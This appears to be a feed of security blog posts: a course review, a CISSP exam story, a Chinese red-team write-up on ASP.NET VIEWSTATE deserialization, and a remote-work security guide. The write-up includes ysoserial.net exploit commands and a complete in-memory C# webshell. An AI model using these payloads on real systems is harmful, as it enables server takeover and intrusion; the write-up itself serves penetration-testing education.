The way the course built from small functions and examples, all meant to be reused and built upon, really made the course worthwhile and feel like an investment I could take advantage of later in my own tools. I’ve already managed to craft a dropper that executes a staged Cobalt Strike payload that evades Windows Defender. How’s that for a practical hands-on course?

No Certification Exam

The course is not preparation for or in any way associated with a certification exam, which in this case I think is a good thing. The course presents fundamental knowledge that is immensely useful in offensive security, and I think it’s best learned for its own sake rather than to add more letters after your name. I like certifications in general and have several, but I found myself not worried about covering the material for an exam and enjoyed learning the material and thinking of practical applications of it at work and in CTFs, Hack The Box, etc. instead. It’s a nice feeling.

Conclusion

I loved this course, and reenz0h is a phenomenal instructor. If it’s not been obvious so far, I’ve gained a lot of fascinating and practical knowledge that will be useful far into the future. My recommendation: take this course if you can. It’s affordable, not an excessive time commitment, and worth every second and penny you spend on it. And just in case my enthusiasm comes across as excessive or shilling, I have no association with Sektor7, their employees, or the authors of the course. Just a happy pentester with some new skills.

Slayed CISSP

15 March 2020 at 23:03

I saw this day a countless amount of times in the last two months. Typing this blog post after passing the exam, is a surreal feeling. Forecasting a goal, envisioning its completion, and driving it home is the things fairy-tales are made of. How the air smells at that time? What does it taste like? Why I deserve it? How all the countless hours of study I am willing to endure would eventually lead to pay-dirt and once again, me on top! Triumphant. How relieved I’d be? How much elation I’d be feeling. Like having a superpower to force anything I want into existence. Gotta have that vision!

I’ll get to what studying looked like, felt like, exam review dialogue and such soon. Yes! This post is LONG. But guess what I’m the one who had to write it. I didn’t do it for myself, I did it for you. The length was dictated by however many words I needed to produce a post with the context of what I would have wanted in hindsight after passing the exam. Most of the blogs I see are humble brags of people looking for everyone to kiss their feet since they passed it. Some are really good like the ones at the end of the post. Some are long and list out key things you should be on the lookout like CMMI or BCP without any other context. Continuing by saying how it was the MOST difficult test of their life, they felt like they were going to fail when the test ended. I just don’t think this is or has to be the typical case. Anyone can pass CISSP – keep reading and I’ll detail how to study and why most of the practice materials are broken. You could extrapolate something out of that too (if you only use the recommended study materials you will fail).

The point needs to be restated that I think the journey is the most valuable portion of attempting certifications not the actual cert. This one for instance, proves you are not only familiar with all the content from the 8 domains, but also, able to synthesis and apply it to scenario-based situations using sound risk management principals acting as an Information Security Manager. Not only do I want to provide a valuable resource for exam preparation but also give you insight and texture into my life during the entire process.

Part-1: What’s My Motivation?

Time: Late December 2019

Self Introspection (self observation) – is important as it’s a kind of regular check on self development which helps you to know what we have achieved so far.

I was promoted in December 2019 to Application Security Manager 😛 (for context). Christmas is a really special time in the Caribbean so I try to be there every year during that holiday period. (That’s how you end the year baby 👊🏽) So literally the next day after getting home from the trip (still having a week off before I go back to work) I start to get the feeling. Anybody know what I’m talking bout? The thirst? Watch TV for maybe a few hours, go out a day, chill then it’s like “What am I doing with my life? What’s all this idle time I have? How do normal people do nothing for most of their lives? Happens to me every time 💯

I had preconceived thoughts about CISSP honestly. “It’s typical to fail on first try” … “It’s a management exam” … “It’s an inch deep mile wide”  … “Reddit horror stories”  … “Folks literally studying on average 6 months some 1 year”. After doing some research I decided it was the one for me. Not only would it give some sort of legitimacy to my new position, it would, in addition, significantly broaden my understanding of Information Security and Risk Management.

I ordered the following studying materials the same day based on research from CISSP sub-reddit:

Major S/O to that sub it’s a trove of information! That’s part of why blog. As to keep this process continually flowing. Provide helpful materials to those after you.  We have to realize 90% of the time we’re acting as consumers not producers. I think it takes a certain level of appreciation for the field overall to be devoted to giving back in whatever form you can. We all have something we can contribute ‼

Life happened and I wasn’t able to start studying immediately. Shame because I got a free same-day delivery of the books. I never even opened the package when it came. Put it in my office and it sat there for most of January.

Part-2: What Was The Preparation Like?

Time: End of January 2020

Thinking about sports and basketball in particular – How many free throws might a average player shoot per day when trying to improve their percentage? 50 free throws per day? 100? 500? That number may actuality be well around 2 thousand or more. Now lets abstract that a little and dumb it down for a second. It’s not going to be anything novel. You need to consistently be shooting your free throws. In this case it all the practicing, reading all the materials from different sources, doing more practice questions, flashcards it’s all apart of the process. You can’t go a weekend without studying, or even a day. Consistently & repeatedly!

You guys know by now, there’s nothing special about me I just feel like when I really want something there an insatiable thirst to quench and borderline obsession maybe for me to get it. I guess what I’m trying to say is I know how to “Lock In”. I literally had hundreds of unanswered LinkedIn messages, DMs, text everything. I cut everybody off and focused at the task at hand. It would need my upmost attention at all times. There’s absolutely no going out, minimal TV, if I’m commuting I’m reading, if I’m on break I’m reading or researching, when I get home I’m getting settled at say 5 pm and then grinding till I’m dosing off. In bed i’m reading. When I wake up before I get out the bed I’m reading. Around this time is when you realize you could live with someone and be a complete stranger to them in the same house 😂 So some of the attributes that describes someone in this stage is consistency, dedication, resolve, discipline, resiliency.

You have to REALLY want it. When you do you are laser-focused. As random as this is I see myself in my head as i’m typing this as heat-seeking missile. I’m coming in hot and I will not miss! I care about accuracy and precision. You get the picture. Whatever it means to you – “Lock In” that’s the mode you need to be in – keeping in mind it’s a marathon not a sprint. Life will happen some days you’ll be much more motivated than others – but anything in your control better be related to CISSP.

  • Sybex Official Study Guide 8th Edition  (8/10) – This behemoth took me about 2 weeks to finish. I didn’t read it intently but more skimming and identifying what I absolutely don’t know, or if I know something’s right for the wrong reason. You can register the Sybex book along w/ the practice test on the Wiley test bank. It allows you to take the chapter questions in the exam atmosphere instead of writing in the book as well as practice exams. All your work is tracked and saved. After I finished reading the book I registered it and proceeded to go thru each domain’s chapter questions. I would say my average was in the 60’s for most of them. Bunch of new material, definitely vast amount of knowledge you need for every single domain. I was familiar with the SDLC / Security Testing / IR domains from work related experience. Gets two dings for being so damn big. Very useful but again it’s not something you can use alone to pass exam despite it being the “Official Study Guide” 🤔
  • Kelly Handerhan’s (9/10) – Sadly these aren’t free anymore 😥 She really does an amazing job of relaying complex topics in easy digestible manner. She also gives you the 2nd half of what you need to pass, the mindset. Even with the recent price change I still think this worth however much it cost. You won’t read one Reddit or ISC2 post that doesn’t mention her. Gets a ding since you can’t alone pass exam with this.Scored low on my first Sybex Practice after her videos. I spot checked which domains I was coming up short in and went back to read it in the Sybex book again.
    Boson Test Engine (8/10) – One of the most valuable resources. Great bank of test questions that have amazing well written thorough explanations. The secret sauce here is no matter if you get an answer incorrect or not you read the explanation. You’re confirming here if you were right for the wrong reason, or why you were wrong, or in what scenarios may one of the answer could possibly be right in another situation. That’s the beauty of Boson. This helps you identity where you’re weak. Guess what you do after? You use the book or another source (tons of material out there) to better understand whatever it is.The reason Boson gets 2 dings is that the beauty is in their explanations not necessarily the questions. Which in hindsight are way to technical. Which are reminiscent of all the study material test.
  • It’s now about mid-February and a blessing falls from the sky directly into my lap. I find my MOST valuable resource.
    Discord CISSP Server (12/10). This type of forum was perfect for most of my learning when tackling technical certs so I knew it would push me here. We’re equally amazing but some unmatched wisdom in there for sure! This drastically improved the amount of information you retain as well as increase the depth of such information respectively. I think this is the case because you’re not just you in your head alone in your room with a book. You’re now defending your argument on a particular question, or understanding why you’re wrong, this goes on 24/7 since the group is global. 4 pm EST or 4 am there’s going to be active discussions ALWAYS going on. There’s a psychological aspect to this as well. Feeling like you’re alone in a fight is depressing. Having an active army of mission-oriented soldiers all ready to fight, defend and operate 🔫 ?! Oh now this is a whole different story! Don’t underestimate the power of a topic being explained to you by a person instead of a blog post. I’ll forever be apart of this channel – definitely my new brothers and sisters. Blame most of me passing on them!
  • I start to do a million practice questions from anything I could find books, practice sites, old materials. I guestimate I did over six thousand practice questions. I can remember off hand doing 1300 in a 2 day hiatus 🧾At this point I’m at about 5 hrs a day on weekdays and at least 12+ hrs on weekends #overdrive
  • Sari Green’s CISSP (9/10) course. Decided to change the pace a little bit. This was awesome very helpful with the most important thing being she delivers the material with a strong risk management undertone. Another thing was how she aligned the entire course based on the sections in the CISSP domain outline. Gets a ding since the material is about 5 years old so it misses new information about some of the topics. Like IOT SCADA Embedded Device. Recommended.
  • Mike Chapple LinkedIn Learning CISSP (9/10) course. Very good! The course is taught in a way that isn’t typical of what you’d expect in a CISSP course. The way he provides practical realizations of the topics to seal it in is incredible. You can remember PGP until the cows come home get hit with a question and totally only know that PGP stands for Pretty Good Privacy 😂 memorization won’t help you in the exam. He shows you in real-life implementations of the exam topics. Wonderful course.
  • After I finished all those I started from domain one and did the following for all 8 domains
    • Read Sybex chapter summary
    • Read 11th hr chapter summary
    • Watch Sari domain summary
    • Do Mike Chapple practice questions for associate domain
  • We’re at about 2 weeks out now time wise. I started to read all the NIST documents related to the major processes in the various domains. These actually were well written and I learned to love them. Every night I would open them and try to relate everything I was doing back to risk management. I’m still doing practice problems but maybe like 10 a day at this point. Most of my time is spent trying to understand the SDLC in depth, the IR process in depth, the BCP/DR process in depth. You not only need to understand the order of the processes but all the details & outputs that come from each.
  • (Maybe one month ago 2 member of the squad from Discord discovered we all have the same exam date) The day before exam I get hit up to join a conference with both of them to do so last day studying. Without this I wouldn’t have passed. We spend 10 hours going over all the major processes, ironing out our understandings and tying relate everything back to the RMF. It’s 10 pm night before exam and boy I’m thinking I probably shouldn’t have did all of that studying today in fear of cramming and losing it. I’m also pissed at myself for drinking a redbull 30 minutes earlier. Because I should be sleeping but a hr has gone by and I’m still wide awoke – I hope I get to sleep soon in fear of not getting good rest and failing.

Part-3:  You Didn’t All This Work For Nothing, Did You?

Time: Mid-March 2020

When I scheduled my exam I purposely chose a Saturday morning. I did not want to deal with the variables that a “normal” morning commute might include – so I was going to be lazy and Uber to the testing center. Now being so paranoid I just drove there and paid the crazy fee to park in the garage. I listened to Kelly’s “Why You Will Pass The CISSP” video and Larry Greenblat “CISSP Exam Tips” videos before leaving the car. Crazy only seeing about 4 people when on a regular day – a low amount normally would be around 50-100 and tons of traffic at any given time – people jogging, women pushing strollers, people and their dogs, as well as tons of business folk – it’s directly across the street from a train station.

At this point, the sports reference is to boxing. Here’s my thoughts walking to from the garage to exam center – “You did not come this far to lose did you? You’ve been wrong countless amounts of time on Discord and understood why. You worked your buns off! You learned the material, the mindset, you’ve watched hundreds of videos, did thousands of questions, read tons of pages. You’ve got some of the most distinguished practical offensive certs in existence, are you going to let a multiple choice management exam that most people fail because they don’t slow down to read defeat you? You’re going to knock this exam on it’s face. You already visioned this day many times before.  This is going to turn out just like all the other times – you put in the work and the results are going to prove such is true at the end. If you synthesized the information the way you think you do you’re going to do amazing” This is how I’m I’m trying to make myself feel

In reality I’m scared as shit about this exam 😂 it’s not that I don’t the material – its I don’t know what I don’t know. Most people on Reddit say when they see the first 25 questions they sometimes wonder if the proctor configured them for the wrong exam 😌 Here’s what calmed me down sorta grounded me. I had small talk with a guy as we’re walking to bathroom and we ask one another what we’re up against this morning. Turns out him along with 90% of the other people there (16 total) were taking their medical exam. It was 7 hrs! I literally said to myself “Shitttt boy you got it good!” 🤣 It’s all relative 💭 My number gets called and I get seated for the exam. They had disposable covers for the noise cancelling headphones 🤞🏽

I had this plan to write all my brain dump stuff on the pad they gave me before starting. You get 5 minutes to read and sign NDA. One of the things I wanted to write down was the forensic process. I started to list them out and got stuck after the “Collection” phase – It’s scares the living fucking daylight out of me. I said “F-This” and clicked “Start Exam” true story 🤦🏽‍♂️

Part-4: Put Up Or Shut Up!

The questions didn’t seem like they were designed to trick me. I was comfortable with the terms in most questions. The difficulty is in the subjective and vague nature of all the questions. Unlike the practice question which test if you know terms and definitions, the exam places you in scenarios where you play from the perspective of a security manager and have to apply sound risk management principals – remembering your job is to reduce risk, provide information for senior management and apply the appropriate level of protection to your assets depends on their value and classification. Most of the questions are BEST, LEAST, WORST with all the possibly choices either being all right or all wrong. On a bunch of occasions I was able to eliminate 2 off the jump. The remaining 2 choices are what’s going to keep you up at night. I got a crazy subnetting question that I attempted to start breaking down on my pad to binary and do the power of 2’s after 20 seconds I said “F – This” and clicked “Next“. There were some gimmie’s sprinkled in there as well. Don’t forget “inch deep, mile wide” it’s way too much material for every single question to be a boulder. I made sure to slow down scrutinize every word in the questions, re-read all questions and answers and reading back the answer I chose. If a question was “Blah blah blah .. Which of following feature of Digital Signatures would BEST provide you with a solution to prevent unauthorized tampering?” … And the answer is integrity … Before moving on I’d say “Integrity is the feature of Digital Signatures that best provide the solution to the problem” … Here’s what I saw most followed by question to illustrate the context for each one:

  • SDLC Related – What SDLC is Change Management most likely to be apart of?
  • BCP Related – A global pandemic of a deadly virus is on the brink. How does the BIA help you determine your risk?
  • IR Related – The sky is falling and something just hit you in the head. What process of IR are you most likely in?
  • Bunch of stuff on Access Controls – How can i best protect this if that?
  • One question of Encryption – Understand PPP L2TP PPTP L2F their succession which ones can use IPSEC, EAP
  • Bunch of Risk Management – Something just happened you need to do something. With these constraints. What’s best?
  • Asset and Data Classification/Security – Why do we classify anything?
  • Web Application Attack Recognition – Seeing and recognizing attacks described through a scenario or graphical depiction
  • US and Global Privacy Frameworks – GDPR – ECPA – OECD
  • Roles and Responsibilities – Who’s MOST important for security? CISO CEO ISM ISSO?
  • Communication & Network Security – What layer is LLC most likely apart of ?

I was nervous as hell clicking “Next” on the 100th question. I knew if exam ended I either did really well or really horribly also if it continued I knew I was exactly on the borderline and could still pass up to 150 but each question would have to be correct. If that was the case I wouldn’t have been pissed but I didn’t want that to occur to even have to be in that situation. The exam stops. I’m like “HOLY SHIT”. I get the TA’s attention, she signs me out and I go to the reception area to get the print-out. The receptionist was at the bathroom 😫 had to wait 5 minutes for her to come back. I was pacing so much the entire time I probably could have burned a hole in their damn carpet. The lady takes my ID and prints it out the result, peaks it, folds it and gives it to me looking me dead in the eye with a straight face. But I did notice it was one piece of paper and people said if you get one paper you pass – if you get more it’s because you failed and that’s the explanation of the domains you came up short in. I opened it and saw I had PASSED 😍 I threw the wildest air punch in history, luckily didn’t hurt myself, jump up and down a little (nobody else in reception area at this point, say “LET’S GO” as loud as I can (since the students are literally just around the corner) and notice the receptionist now smiling so said “Congratulations sorry I had to mess with you” 😂 Here’ it was guys that moment of passing that I visioned! Slaying the dragon. What a wonderful feeling 💘

Part-5: Thoughts?

If you’ve made it this far s/o to you! I’ll never write a TL/DR ever ✌🏽 The context matters … The journey matters.

My biggest advice would be to make the NIST RMF, SDLC and all the related documents your friend. These are going to help you substantially more than doing a zillion practice questions or reading the huge books. Also it sheds light on why so many smart technical folk fail this exam the first time. The day before the exam me @Beedo @Reepdeep MAJOR S/O TO THOSE GUYS – WHO ALSO PASSED THE SAME DAY studied from 1 pm to 10 pm going through all the processes from each domain, in our own words, understanding the steps to the process but understand how every single thing is tied back to risk management.
NOTE: We think the document we created could help everyone out there out as a definitive source for passing the exam. Obviously folks need to get back to the real life and people they’ve neglected since beginning the journey but it’s something we all feel strongly about and want to provide to the community hopefully soon 😎

Part-6: Things I Shared on Discord That I Think Should Be Included Here?

These are just excerpts but I figured they maybe valuable since you forget basically everything related to the exam afterwards.
Bear with me as the grammar may not be perfect it’s Discord so I’m not necessarily caring if I make a mistake to correct it. It’s conversational texting-like language. Most of it being typed from my phone.

In regards to the difference in seemingly all the practice material vs real exam:

“I see why all the practice material miss the mark. It’s because you truly need a intelligent person to be able to spend the time to make those questions and that person cost too much to write free questions on the internet for us .. Those aren’t ones you come up with based on a definition .. You understand someone thought deeply about this, so much so they knew the answer I’d immediately go for (and it’s wrong) is included as say answer A and make the right answer further down the list like D. You need to be very careful. Also saw 2 similar looking answers where you jumped immediately to the answer and didn’t thoroughly read it would have noticed the 2nd one further down was more right”

In regards to our day before exam study conference: 

it was impromptu as hell I was just going each of my Boson question explanation. It lasted lot longer than expected 😵🥴 went from like 1-10 yesterday on conference, went over each process understanding it and connecting the SDLC steps BCP steps back to RMF I’m sure they’ll agree understanding how everything relates back to RMF is the way to pass. Not technical … Not all the questions … Since they’re way to technical (use em to identify and reinforce you’re weak areas) we were already studied up at that point … Sybex/Boson/AIO/All the sources questions way to hard if we talking scope for exam. You’ll be placed in a bunch of situations where you’re somebody in security what’s BEST LEAST solution for this scenario.

On depth of question and context. Keep in mind we already knew the blocks lengths, key size ect:

For context it’s like understanding AES is a strong symmetric algorithm, DES is a weak one that shouldn’t be used. But not that 3DES EEE has a xyz length bit size and it goes through xy rounds – the latter is unnecessary .. If you know it so be it but that’s how I would scope everything. High level and how does is connect back to RMF .. I would read the RMF and SDLC NIST doc every night

On what I think is useful studying:

I’m saying you’ve read Sybex or over big book feel comfortable been browsing reddit know the sources the videos and all the questions we do here then can go through the 11th hr and understand everything then I would focus on the processes and how it relates to RM SDLC, IR, BCP knowing how those relate was my entire exam. I had a bunch of SDLC stuff lot of OWASP what vulnerability is this? Few question from domain 4 IPSec and understanding the protocol or layer.

Overall exam tips and thoughts:

“The exam was tough but I didn’t feel any point they were trying to trick or deceive me, every question was able to eliminate two answers of back. Some of the answers are similar then you figure out differences which was slightly hard in some cases some not. Felt familiar with all the terms answers. Question were clear. I didn’t even notice the experimental which I was on look out for. I think when studying we equate inch deep mile wide to difficult. In reality it’s just understanding how the domains work together. Remember every question CANNOT be a boulder. There were some gimmes… what is encryption… what is integrity for digital signatures type stuff. My best advice in hindsight with the above is DO NOT WASTE YOUR TIME doing all these questions, Boson, Ccure, Luke, Sybex. All of them! Only if you’re weak. If you can read 11th hr and notice everything nothings a shock stop. Understand how everything is bound by risk management. Btw I didn’t use the whole mgr mindset I just tried pick best 2 remaining options. There were plenty of answers that were “doing something” I threw those out automatically”

On how I would study differently:

“don’t worry and spend some time in the nist document’s 800-64 800-37 they all link to each other. So your thinking going through say SDLC is what am I doing in this step and how does it relate back to the RMF everything relates back to it. For example that in phase one of  the SDLC you have your requirements and stuff but you’re also initially understanding the systems that links back to step one in RMF which is Categorize, so think does this system store transmit or processes pii, what’s the risk. Or step two Development in SDLC, you know you starting design architecture development and testing, that relates to steps 2&3 (you also do risk assessment here) in RMF you’re identified the need for the system in initial requirements, so now in development we select the controls of the system and assess them that’s in SDLC phase two but you’re always grounded by RMF. See how that relates? I think that understanding this alone is how I passed”

Are questions from sybex syllabus or out of the box?
Wayy to technical as well as all the practice questions

Some people fail who had boson?
Boson shouldn’t be used to judge readiness just identity weak areas. You could get 20% on all bosons and pass since it’s mostly thinking not technical

How’s the difficulty level?
NOT DIFFICULT – DON’T BELIEVE THE HYPE – ALL OF US COULD PASS THIS EXAM

Do we need other source of study hindsight?
Read the NIST documents on all the processes and reclaim some of your time back

You are say every in this group can pass, can you tell your experience and main domain?
Mainly offsec and I do appsec at work for like 4 years. I’m an engineer so i have the fix it mindset by default. You don’t need be expert in anything. Just think of everything in risk mgmt is enough to pass

How long you have been preparing?
Studying since 1/28

What was difficult domain for you?
Domain 2 smh – Focus on 1,3,7 thought and definitely 8.. Obviously you need to be passing in all domains but since those weighted more it more advisable

Did you face any language mixing puzzle questions means they use different vocabulary 
There were NO gimmicks every question i knew exactly what they wanted.

Do you think feedback from people different industry get it more difficult than security?
It’s your understanding and mindset. Kelly and Larry tell you the mindset. I automatically threw any answer out that was “disconnect from network, make a firewall change”.

Did you feel it’s purely management?
No. Because being in mgmt although you’re not a doer you need to have a solid understanding of the underlying area no matter what it is.”

S/O to my Discord guys ALL OF YOU 💗

I’ve included a section below on the links that were most valuable to me. Good luck & NEVER give up or give in!

Part-7: Links

 

 

 

 

 

 

 

 

The post Slayed CISSP appeared first on Certification Chronicles.

玩轉 ASP.NET VIEWSTATE 反序列化攻擊、建立無檔案後門

10 March 2020 at 16:00

前言

這篇文章呼應我在研討會 DEVCORE CONFERENCE 2019 分享的主題,如何用小缺陷一步步擊破使用 ASP.NET 框架所撰寫的堅固的網站應用程式,其中之一的內容就是關於我們在此之前過往紅隊演練專案中,成功數次透過 VIEWSTATE 的反序列化攻擊並製造進入內網突破口的利用方式以及心得,也就是此篇文章的主題。

內文

最近微軟產品 Exchange Server 爆出一個嚴重漏洞 CVE-2020-0688,問題發生的原因是每台 Exchange Server 安裝完後在某個 Component 中都使用了同一把固定的 Machine Key,而相信大家都已經很熟悉取得 Machine Key 之後的利用套路了,可以竄改 ASP.NET Form 中的 VIEWSTATE 參數值以進行反序列化攻擊,從而達成 Remote Code Execution 控制整台主機伺服器。

更詳細的 CVE-2020-0688 漏洞細節可以參考 ZDI blog:

對於 VIEWSTATE exploit 分析在網路上已經有無數篇文章進行深入的探討,所以在此篇文章中將不再重複贅述,而今天主要想聊聊的是關於 VIEWSTATE exploit 在滲透測試中如何進行利用。

最基本、常見的方式是直接使用工具 ysoserial.net 的 ViewState Plugin 產生合法 MAC 與正確的加密內容,TypeConfuseDelegate gadget 經過一連串反射呼叫後預設會 invoke Process.Start 呼叫 cmd.exe,就可以觸發執行任意系統指令。

例如:

ysoserial.exe -p ViewState -g TypeConfuseDelegate
              -c "echo 123 > c:\pwn.txt"
              --generator="CA0B0334"
              --validationalg="SHA1"
              --validationkey="B3B8EA291AEC9D0B2CCA5BCBC2FFCABD3DAE21E5"

異常的 VIEWSTATE 通常會導致 aspx 頁面回應 500 Internal Server Error,所以我們也無法直接得知指令執行的結果,但既然有了任意執行,要用 PowerShell 回彈 Reverse Shell 或回傳指令結果到外部伺服器上並不是件難事。

But ..

在滲透測試的實戰中,事情往往沒這麼美好。現今企業資安意識都相對高,目標伺服器環境出現以下幾種限制都已是常態:

  • 封鎖所有主動對外連線
  • 禁止查詢外部 DNS
  • 網頁目錄無法寫入
  • 網頁目錄雖可寫,但存在 Website Defacement 防禦機制,會自動復原檔案

所以這時就可以充分利用另一個 ActivitySurrogateSelectorFromFile gadget 的能力,這個 gadget 利用呼叫 Assembly.Load 動態載入 .NET 組件達成 Remote Code Execution,換句話說,可以使我們擁有在與 aspx 頁面同一個 Runtime 環境中執行任意 .NET 語言程式碼的能力,而 .NET 預設都會存在一些指向共有資源的全域靜態變數可以使用,例如 System.Web.HttpContext.Current 就可以取得當下 HTTP 請求上下文的物件,也就像是我們能利用它來執行自己撰寫的 aspx 網頁的感覺,並且過程全是在記憶體中動態處理,於是就等同於建立了無檔案的 WebShell 後門!

我們只需要修改 -g 的參數成 ActivitySurrogateSelectorFromFile,而 -c 參數放的就不再是系統指令而是想執行的 ExploitClass.cs C# 程式碼檔案,後面用 ; 分號分隔加上所依賴需要引入的 dll。

ysoserial.exe -p ViewState -g ActivitySurrogateSelectorFromFile
              -c "ExploitClass.cs;./dlls/System.dll;./dlls/System.Web.dll"
              --generator="CA0B0334"
              --validationalg="SHA1"
              --validationkey="B3B8EA291AEC9D0B2CCA5BCBC2FFCABD3DAE21E5"

關於需要引入的 dll 可以在安裝了 .NET Framework 的 Windows 主機上找到,像我的環境是在這個路徑 C:\Windows\Microsoft.NET\Framework64\v4.0.30319 之中。

至於最關鍵的 ExploitClass.cs 該如何撰寫呢?將來會試著提交給 ysoserial.net,就可以在範例檔案裡找到它,或是可以先直接看這裡:

class E
{
    public E()
    {
        System.Web.HttpContext context = System.Web.HttpContext.Current;
        context.Server.ClearError();
        context.Response.Clear();
        try
        {
            System.Diagnostics.Process process = new System.Diagnostics.Process();
            process.StartInfo.FileName = "cmd.exe";
            string cmd = context.Request.Form["cmd"];
            process.StartInfo.Arguments = "/c " + cmd;
            process.StartInfo.RedirectStandardOutput = true;
            process.StartInfo.RedirectStandardError = true;
            process.StartInfo.UseShellExecute = false;
            process.Start();
            string output = process.StandardOutput.ReadToEnd();
            context.Response.Write(output);
        } catch (System.Exception) {}
        context.Response.Flush();
        context.Response.End();
    }
}

其中 Server.ClearError()Response.End() 都是必要且重要的一步,因為異常的 VIEWSTATE 必然會使得 aspx 頁面回應 500 或其他非預期的 Server Error,而呼叫第一個函式可以協助清除在當前 Runtime 環境下 stack 中所記錄的錯誤,而呼叫 End() 可以讓 ASP.NET 將當前上下文標記為請求已處理完成並直接將 Response 回應給客戶端,避免程式繼續進入其他 Error Handler 處理導致無法取得指令執行的輸出結果。

到這個步驟的話,理論上你只要送出請求時固定帶上這個惡意 VIEWSTATE,就可以像操作一般 WebShell 一樣:

不過有時也會出現這種情境:

不論怎麼改 Payload 再重送永遠都是得到 Server Error,於是就開始懷疑自己的人生 Q_Q

但也別急著灰心,可能只是你遇上的目標有很乖地定期更新了伺服器而已,因為微軟曾為了 ActivitySurrogateSelector 這個 gadget 加上了一些 patch,導致無法直接利用,好在有其他研究者馬上提供了解決方法使得這個 gadget 能再次被利用!

詳細細節可以閱讀這篇文章:Re-Animating ActivitySurrogateSelector By Nick Landers

總而言之,如果遇到上述情形,可以先嘗試用以下指令產生 VIEWSTATE 並發送一次給伺服器,順利的話就能使目標 Runtime 環境下的 DisableActivitySurrogateSelectorTypeCheck 變數值被設為 true,隨後再發送的 ActivitySurrogateSelector gadget 就不會再噴出 500 Server Error 了。

ysoserial.exe -p ViewState -g ActivitySurrogateDisableTypeCheck
              -c "ignore"
              --generator="CA0B0334"
              --validationalg="SHA1"
              --validationkey="B3B8EA291AEC9D0B2CCA5BCBC2FFCABD3DAE21E5"

如果上述一切都很順利、成功執行系統指令並回傳了結果,基本上就足夠做大部分事情,而剩下的就是繼續盡情發揮你的想像力吧!

不過有時候即便到了此一步驟還是會有不明的錯誤、不明的原因導致 MAC 計算始終是錯誤的,因為 .NET 內部演算法以及需要的環境參數組合稍微複雜,使得工具沒辦法輕易涵蓋所有可能情況,而當遇到這種情形時,我目前選擇的解決方法都是發揮工人智慧,嘗試在本機建立環境、設定相同的 MachineKey、手工撰寫 aspx 檔案,產生包含 gadget 的 VIEWSTATE 再轉送到目標主機上。如果你有更多發現或不一樣的想法願意分享的話,也歡迎來和我交流聊聊天。

遠距工作的資安注意事項

3 March 2020 at 16:00

近期因新型冠狀病毒(COVID-19, 武漢肺炎)影響,不少企業開放同仁遠距工作 (Telework)、在家上班 (Work from home, WFH)。在疫情加速時,如果沒有準備周全就貿然全面開放,恐怕會遭遇尚未考慮到的資安議題。這篇文章提供一個簡單的指引,到底遠端在家上班有哪些注意事項?我們會從公司管理、使用者兩個面向來討論。

如果你只想看重點,請跳到最後一段 TL;DR。

攻擊手段

我們先來聊聊攻擊的手段。試想以下幾個攻擊情境,這些情境都曾被我們利用在紅隊演練的過程中,同樣也可能是企業的盲點。

  1. 情境一、VPN 撞庫攻擊:同仁 A 使用 VPN 連線企業內部網路,但 VPN 帳號使用的是自己慣用的帳號密碼,並且將這組帳號密碼重複使用在外其他非公司的服務上(如 Facebook、Adobe),而這組密碼在幾次外洩事件中早已外洩。攻擊團隊透過鎖定同仁 A,使用這組密碼登入企業內部。而很遺憾的 VPN 在企業內部網路並沒有嚴謹的隔離,因此在內部網路的直接找到內網員工 Portal,取得各種機敏資料。
  2. 情境二、VPN 漏洞:VPN 漏洞已經成為攻擊者的主要攻略目標,公司 B 使用的 VPN 伺服器含有漏洞,攻擊團隊透過漏洞取得 VPN 伺服器的控制權後,從管理後台配置客戶端 logon script,在同仁登入時執行惡意程式,獲得其電腦控制權,並取得公司機密文件。可以參考之前 Orange & Meh 的研究: https://www.youtube.com/watch?v=v7JUMb70ON4
  3. 情境三、中間人攻擊:同仁 C 在家透過 PPTP VPN 工作。不幸的是 C 小孩的電腦中安裝了含有惡意程式的盜版軟體。攻擊者透該電腦腦進行內網中間人攻擊 (MITM),劫持 C 的流量並破解取得 VPN 帳號密碼,成功進入企業內網。

以上只是幾個比較常見的情境,攻擊團隊的面向非常廣,而企業的防禦卻不容易做到滴水不漏。這也是為什麼我們要撰寫這篇文章,希望能幫助一些企業在遠距工作的時期也能達到基本的安全。

風險有什麼

風險指的是發生某個事件對於該主體可能造成的危害。透過前面介紹的攻擊手段要達成危害,對攻擊者來說並不困難,接著我們盤點出一些在企業的資安規範下,因應遠距工作可能大幅增加攻擊者達成機率的因子:

  • 環境複雜:公司無法管控家中、遠距的工作環境,這些環境也比較複雜危險。一些公司內部的管理監控機制都難以施展,也較難要求同仁在家中私人設備安裝監控機制。
  • 公司資料外洩或不當使用:若公司的資料遭到外洩或不當使用,將會有嚴重的損失。
  • 設備遺失、遭竊:不管是筆電或者是手機等裝置,遺失或者遭竊時,都會有資料外洩的風險。
  • 授權或存取控制不易實作:在短時間內提供大量員工的外部存取,勢必會在「可用性」和「安全性」間做出取捨。

若公司允許同仁使用私人的設備連上公司內部 VPN,這樣的議題就等同 BYOD (Bring Your Own Device),這些安全性的顧慮有不少文章可以參考。例如 NIST SP800-46 Guide to Enterprise Telework, Remote Access, and Bring Your Own Device (BYOD) Security https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-46r2.pdf

公司面向

接下來我們來看看公司方面在遠距工作上面有哪些資安上面的作為。

工作流程及原則規劃

  • 工作流程調整:遠距工作時,每個流程該如何作對應的調整,例如如何在不同地點協同作業、彙整工作資料、確認工作成果及品質等。
  • 資料盤點:哪些資料放在雲端、伺服器、個人電腦,當遠距工作時哪些資料將無法被取用,或該將資料轉移到哪邊。
  • 會議流程:會議時視訊設備、軟體選擇及測試,並注意會議軟體通訊是否有加密。狀況如會議時間延長、同時發言、遠距品質影響等。
  • 事件處理團隊及流程:因遠距工作時發生的資安事件,該由誰負責處理、如何處理、盤點損失。
  • 僅知、最小權限原則:僅知原則 (Need-to-know Basis) 以及最小權限原則 (Principle of Least Privilege, PoLP),僅給予每個同仁最小限度需要的資料以及權限,避免額外的安全問題。

網路管理

  • VPN 帳號申請及盤點:哪些同仁需要使用 VPN,屬於哪些群組,每個群組的權限及連線範圍皆不同。
  • VPN 帳號權限範圍及內網分區:VPN 連線進來後,不應存取整個公司內網所有主機,因為 VPN 視同外部連線,風險等級應該更高,更應該做連線的分區管控。
  • 監控確認 VPN 流量及行為:透過內部網路的網路流量監控機制,確認 VPN 使用有無異常行為。
  • 只允許白名單設備取得 IP 位址:已申請的設備才能取得內網 IP 位址,避免可疑設備出現在內部網路。
  • 開啟帳號多因子認證:將雲端服務、VPN、內部網路服務開啟多因子認證。
  • 確認 VPN 伺服器是否為新版:在我們過去的研究發現 VPN 伺服器也會是攻擊的對象,因此密切注意是否有更新或者修補程式。

